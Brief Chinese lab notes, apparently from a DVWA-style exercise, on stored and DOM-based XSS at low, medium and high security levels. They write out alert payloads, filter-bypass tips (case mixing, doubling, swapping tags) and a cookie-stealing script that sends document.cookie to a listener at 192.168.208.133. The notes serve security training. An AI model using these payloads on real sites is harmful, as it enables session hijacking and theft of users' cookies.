存储型:
低:
输入 <script>alert('XSS stored')</script>
存储型XSS是长期存储在服务器端,每次访问时都会执行js脚本
<script οnlοad=alert('XSS1')>
<a href=https://www.baidu.com>登录</a>3
<script>new Image().src="http://192.168.208.133/c.php?output="+document.cookie;</script>
Kali监听
<script>alert(document.cookie)</script>
中:
可以使用大小写或者复写绕过
后面的操作与low级别一致
高:
限制了<script>标签,但没有限制娶她标签,可以更换标签进行绕过
DOM型:
低:
没有任何过滤
中:
检查了参数是否为空,限制了<script>
高: